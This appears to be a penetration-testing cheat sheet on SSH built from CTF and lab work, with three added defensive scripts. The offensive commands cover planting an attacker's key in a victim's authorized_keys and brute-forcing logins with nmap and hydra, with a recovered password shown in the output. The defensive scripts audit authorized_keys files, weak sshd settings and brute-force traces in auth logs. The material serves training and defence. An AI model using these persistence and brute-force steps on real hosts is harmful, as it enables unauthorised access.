SSH (22)
Service
service ssh start
# Verification
netstat -antp | grep sshd
Keys
SSH Connection
chmod 600 id_rsa
ssh -i id_rsa user@host -p port
Generate Keys
0xSs0rZ@pico-2018-shell:~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/0xSs0rZ/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/0xSs0rZ/.ssh/id_rsa.
Your public key has been saved in /home/0xSs0rZ/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:YPsf7PTkrxc7owo8NkyxQVnfL3ZOS3xf+YDmJNVcMR0 0xSs0rZ@pico-2018-shell
The key's randomart image is:
+---[RSA 2048]----+
| .o. E=|
| .. . + .o|
| o o o + |
| . o + . ....|
| . S . + ++*|
| = . = .o**|
| O + o ++|
| . B = = |
| +.==.o |
+----[SHA256]-----+
0xSs0rZ@pico-2018-shell:~$ cd /home/0xSs0rZ/.ssh
0xSs0rZ@pico-2018-shell:~/.ssh$
0xSs0rZ@pico-2018-shell:~/.ssh$ ls
id_rsa id_rsa.pub
0xSs0rZ@pico-2018-shell:~/.ssh$ cp id_rsa.pub ~/.ssh/authorized_keys
0xSs0rZ@pico-2018-shell:~/.ssh$ ssh -i id_rsa 0xSs0rZ@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:1/2OUR2IggrhZwLysFuJlUZ169yf1BFVeTIDW8Fo5XU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
picoCTF{quelquechose}
Authorized-Keys
# Attacker
root@Host-001:~/Bureau/htb# cat traceback.pub
ssh-rsa ...SNIP... root@Host-001
root@Host-001:~/Bureau/htb#
# Victim
webadmin@traceback:/home/webadmin/.ssh$ echo "ssh-rsa ...SNIP... root@Host-001" >> authorized_keys
webadmin@traceback:/home/webadmin/.ssh$
# Connection
root@Host-001:~/Bureau/htb# ssh -i traceback webadmin@10.10.10.181
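The append above is exactly what a defender looks for afterwards: a key in authorized_keys that nobody approved. The script below is an added example, not part of the original notes; it reads an authorized_keys file, compares each key blob against a baseline of approved blobs, and flags keys that are unknown, unrestricted (no `from=` option) or DSA. The file contents, the baseline and the base64 blobs are all constructed placeholders, not real keys.

```shell
#!/bin/sh
# Added example: review an authorized_keys file after a suspected key drop.
# Every key below is a CONSTRUCTED sample; the base64 blobs are placeholders,
# not real keys, which is why they are short.
AUTHORIZED_KEYS=$(cat <<'EOF'
# authorized_keys for webadmin (constructed sample)
from="10.10.10.0/24",restrict ssh-ed25519 AAAAC3PLACEHOLDERKEY1 webadmin@laptop
ssh-rsa AAAAB3PLACEHOLDERKEY2 webadmin@backup
ssh-rsa AAAAB3PLACEHOLDERKEY3 root@Host-001
EOF
)

# Blobs an administrator approved earlier (constructed baseline), space separated.
BASELINE_KEYS="AAAAC3PLACEHOLDERKEY1 AAAAB3PLACEHOLDERKEY2"

# audit_authorized_keys BASELINE < authorized_keys
# Prints one tab-separated line per key: type, comment, options, verdict.
# Verdicts: NOT-IN-BASELINE (blob never approved), NO-SOURCE-RESTRICTION
# (no from= option), DEPRECATED-DSA, or OK.
audit_authorized_keys() {
    awk -v baseline="$1" '
    BEGIN {
        n = split(baseline, approved, " ")
        for (i = 1; i <= n; i++) known[approved[i]] = 1
    }
    /^[ \t]*(#|$)/ { next }   # comments and blank lines carry no key
    {
        # Locate the key-type token; anything before it is the options field,
        # the blob follows it, and the rest of the line is the comment.
        kt = 0
        for (i = 1; i <= NF; i++)
            if ($i ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521))$/) { kt = i; break }
        if (kt == 0 || kt == NF) { printf "?\t?\t?\tUNPARSEABLE\n"; next }
        type = $kt; blob = $(kt + 1)
        opts = ""; for (i = 1; i < kt; i++) opts = opts (i > 1 ? " " : "") $i
        comment = ""; for (i = kt + 2; i <= NF; i++) comment = comment (i > kt + 2 ? " " : "") $i
        verdict = ""
        if (!(blob in known))        verdict = verdict "NOT-IN-BASELINE,"
        if (opts !~ /(^|,)from=/)    verdict = verdict "NO-SOURCE-RESTRICTION,"
        if (type == "ssh-dss")       verdict = verdict "DEPRECATED-DSA,"
        sub(/,$/, "", verdict)
        if (verdict == "") verdict = "OK"
        printf "%s\t%s\t%s\t%s\n", type, (comment == "" ? "-" : comment), (opts == "" ? "-" : opts), verdict
    }'
}

# count_unbaselined_keys BASELINE < authorized_keys : number of keys nobody approved
count_unbaselined_keys() {
    audit_authorized_keys "$1" | awk -F'\t' '$4 ~ /NOT-IN-BASELINE/ { n++ } END { print n + 0 }'
}

# Stand-alone run over the constructed sample
printf '%s\n' "$AUTHORIZED_KEYS" | audit_authorized_keys "$BASELINE_KEYS"
```

On a real host, run it over every `~/.ssh/authorized_keys` (and any `AuthorizedKeysFile` paths from sshd_config) with a baseline of blobs taken from a known-good snapshot; the `root@Host-001` key shows up as NOT-IN-BASELINE,NO-SOURCE-RESTRICTION, which is the line to act on. Certificate key types (`*-cert-v01@openssh.com`) are reported as UNPARSEABLE rather than silently skipped.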
Pseudo-Terminal
ssh -t bandit18@localhost /bin/sh
SSL Encryption
echo pass | openssl s_client -quiet -connect localhost:30001
Generate key
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/parrot/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/parrot/.ssh/id_rsa
Your public key has been saved in /home/parrot/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:...SNIP... parrot@parrot
The key's randomart image is:
+---[RSA 3072]----+
| o.. |
| ...SNIP |
| ...SNIP |
| ...SNIP |
| ...SNIP |
| ...SNIP |
| ...SNIP |
| + +oo+o |
+----[SHA256]-----+
SSH with a key id_rsa
[Apr 06, 2024 - 07:50:27 (EDT)] exegol-CPTS /workspace # chmod 600 id_rsa
[Apr 06, 2024 - 07:52:03 (EDT)] exegol-CPTS /workspace # ssh -i id_rsa ceil@10.129.42.195
Metasploit
Dangerous settings
Setting                     Description
PasswordAuthentication yes  Allows password-based authentication.
PermitEmptyPasswords yes    Allows the use of empty passwords.
PermitRootLogin yes         Allows logging in directly as the root user.
Protocol 1                  Uses the outdated SSH protocol version 1.
X11Forwarding yes           Allows X11 forwarding for GUI applications.
AllowTcpForwarding yes      Allows forwarding of TCP ports.
PermitTunnel                Allows tunneling.
DebianBanner yes            Displays a distribution-specific banner when logging in.
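To check a host for the settings in that table without reading sshd_config by eye, the script below is an added example (not from the original notes) that prints each dangerous setting found next to its hardened value. Both configurations it runs over are constructed samples, one weak and one hardened; neither is taken from a real host.

```shell
#!/bin/sh
# Added example: flag the dangerous sshd_config settings from the table above
# and print the hardened value beside each finding. Both configs below are
# CONSTRUCTED samples, not taken from any real host.
WEAK_SSHD_CONFIG=$(cat <<'EOF'
# constructed weak configuration
Port 22
Protocol 1
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
X11Forwarding no
AllowTcpForwarding yes
PermitTunnel point-to-point
DebianBanner yes   # trailing comment, stripped by the audit
EOF
)

HARDENED_SSHD_CONFIG=$(cat <<'EOF'
# constructed hardened counterpart
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
X11Forwarding no
AllowTcpForwarding no
PermitTunnel no
DebianBanner no
PubkeyAuthentication yes
EOF
)

# audit_sshd_config < sshd_config
# Prints one tab-separated line per finding: setting, recommended value, why.
# Keywords are matched case-insensitively, as sshd does, so the output of
# "sshd -T" (lowercase keywords, effective values) can be fed in too.
audit_sshd_config() {
    awk '
    function flag(setting, fix, why) { printf "%s\t%s\t%s\n", setting, fix, why }
    { sub(/#.*/, "") }          # drop comments, whole-line or trailing
    NF >= 2 {
        key = tolower($1); val = tolower($2)
        if (key == "passwordauthentication" && val == "yes") flag("PasswordAuthentication yes", "no", "password logins can be brute-forced")
        if (key == "permitemptypasswords"   && val == "yes") flag("PermitEmptyPasswords yes", "no", "accounts with empty passwords can log in")
        if (key == "permitrootlogin"        && val == "yes") flag("PermitRootLogin yes", "no (or prohibit-password)", "root logs in directly, no per-user accountability")
        if (key == "protocol"               && val ~ /1/)   flag("Protocol " $2, "2", "SSH-1 is obsolete and cryptographically weak")
        if (key == "x11forwarding"          && val == "yes") flag("X11Forwarding yes", "no", "exposes the client X server to the host")
        if (key == "allowtcpforwarding"     && (val == "yes" || val == "all")) flag("AllowTcpForwarding " $2, "no", "host becomes a pivot for port forwarding")
        if (key == "permittunnel"           && val != "no")  flag("PermitTunnel " $2, "no", "layer-2/3 tunnels through the host")
        if (key == "debianbanner"           && val == "yes") flag("DebianBanner yes", "no", "leaks the distribution version to scanners")
    }'
}

# count_sshd_findings < sshd_config : number of dangerous settings present
count_sshd_findings() {
    audit_sshd_config | awk 'END { print NR }'
}

# Stand-alone run over both constructed samples
printf '%s\n' "$WEAK_SSHD_CONFIG" | audit_sshd_config
printf 'hardened findings: %s\n' "$(printf '%s\n' "$HARDENED_SSHD_CONFIG" | count_sshd_findings)"
```

Prefer feeding it `sshd -T` output rather than the raw file: that resolves Include directives and defaults, so a setting that is dangerous only because it was never set (PasswordAuthentication defaults to yes) still shows up. Match blocks are not modelled; a per-user override inside one needs a separate look.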
CVE-2024-6387 - regreSSHion
OpenSSH RCE
SSH Audit
$ git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
$ ./ssh-audit.py 10.129.14.132
Change Authentication Method
$ ssh -v cry0l1t3@10.129.14.132
OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f 31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
For potential brute-force attacks, we can specify the authentication method with the SSH client option PreferredAuthentications.
$ ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password
OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f 31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: password
cry0l1t3@10.129.14.132's password:
Bruteforce
SSH Bruteforce Nmap
[Apr 06, 2024 - 10:09:33 (EDT)] exegol-CPTS /workspace # nmap 10.129.202.20 -sV -p22 --script ssh-brute
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-06 10:09 EDT
NSE: [ssh-brute] Trying username/password pair: root:root
NSE: [ssh-brute] Trying username/password pair: admin:admin
NSE: [ssh-brute] Trying username/password pair: administrator:administrator
NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
NSE: [ssh-brute] Trying username/password pair: guest:guest
NSE: [ssh-brute] Trying username/password pair: user:user
NSE: [ssh-brute] Trying username/password pair: web:web
NSE: [ssh-brute] Trying username/password pair: test:test
NSE: [ssh-brute] Trying username/password pair: root:
NSE: [ssh-brute] Trying username/password pair: admin:
NSE: [ssh-brute] Trying username/password pair: administrator:
NSE: [ssh-brute] Trying username/password pair: webadmin:
Hydra - See Brute force - SSH
$ hydra -L user.list -P password.list ssh://10.129.42.197
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid password found
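Seen from the server, the nmap and hydra runs above leave a burst of "Failed password" lines from one source, and in hydra's case an "Accepted password" line right after them. The script below is an added example, not part of the original notes; it summarises sshd's auth log per source IP, flags sources at or above a failure threshold, and records when such a source then logged in successfully. The log lines are constructed to resemble OpenSSH messages in a Debian-style auth.log and were not captured from a real host.

```shell
#!/bin/sh
# Added example: spot a password-guessing run from the server side using sshd's
# auth log. The log lines are CONSTRUCTED to resemble OpenSSH's "Failed password"
# and "Accepted" messages; they are not captured from a real host.
AUTH_LOG=$(cat <<'EOF'
Jan 10 15:03:51 target sshd[1201]: Failed password for invalid user admin from 10.129.42.100 port 51234 ssh2
Jan 10 15:03:51 target sshd[1202]: Failed password for root from 10.129.42.100 port 51236 ssh2
Jan 10 15:03:52 target sshd[1203]: Failed password for invalid user webadmin from 10.129.42.100 port 51240 ssh2
Jan 10 15:03:52 target sshd[1204]: Failed password for user from 10.129.42.100 port 51242 ssh2
Jan 10 15:03:53 target sshd[1205]: Failed password for invalid user test from 10.129.42.100 port 51244 ssh2
Jan 10 15:03:53 target sshd[1206]: Accepted password for user from 10.129.42.100 port 51250 ssh2
Jan 10 15:05:10 target sshd[1210]: Failed password for alice from 10.129.42.50 port 40001 ssh2
Jan 10 15:05:20 target sshd[1211]: Accepted publickey for alice from 10.129.42.50 port 40002 ssh2: ED25519 SHA256:constructedFingerprint
EOF
)

# detect_ssh_bruteforce THRESHOLD < auth.log
# One tab-separated line per source IP: ip, failures, distinct usernames, verdict.
# An IP at or above THRESHOLD failures is BRUTE-FORCE; if that same IP later got
# an "Accepted" line, the verdict names the account it got into, which is the
# case that needs an incident response rather than just a rate limit.
detect_ssh_bruteforce() {
    awk -v threshold="$1" '
    function peer(   i) {   # returns the IP after "from"; sets user to the name before it
        for (i = 1; i <= NF; i++) if ($i == "from") { user = $(i - 1); return $(i + 1) }
        return ""
    }
    /sshd\[[0-9]+\]: Failed password for / {
        ip = peer(); if (ip == "") next
        fails[ip]++
        if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
    }
    /sshd\[[0-9]+\]: Accepted (password|publickey) for / {
        ip = peer(); if (ip == "") next
        if (ip in fails) got_in[ip] = user   # success after earlier failures from this source
    }
    END {
        for (ip in fails) {
            verdict = "ok"
            if (fails[ip] >= threshold) {
                verdict = "BRUTE-FORCE"
                if (ip in got_in) verdict = verdict ",SUCCESS-AFTER-FAILURES:" got_in[ip]
            }
            printf "%s\t%d\t%d\t%s\n", ip, fails[ip], users[ip], verdict
        }
    }'
}

# count_bruteforce_sources THRESHOLD < auth.log : number of source IPs flagged
count_bruteforce_sources() {
    detect_ssh_bruteforce "$1" | awk -F'\t' '$4 ~ /^BRUTE-FORCE/ { n++ } END { print n + 0 }'
}

# Stand-alone run: 3 failures from one source is enough to flag it
printf '%s\n' "$AUTH_LOG" | detect_ssh_bruteforce 3
```

With threshold 3, the constructed log yields one flagged source (5 failures across 5 usernames, then a successful password login as `user`) while alice's single typo followed by a key login stays "ok". The distinct-username column separates credential stuffing against many accounts from a single user mistyping; a threshold on its own does not. On journald hosts, `journalctl -u ssh --no-pager` produces the same message text and can be piped in directly.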
SSH on Windows
Binaries:
Install SSH on Windows:
Execute command - Windows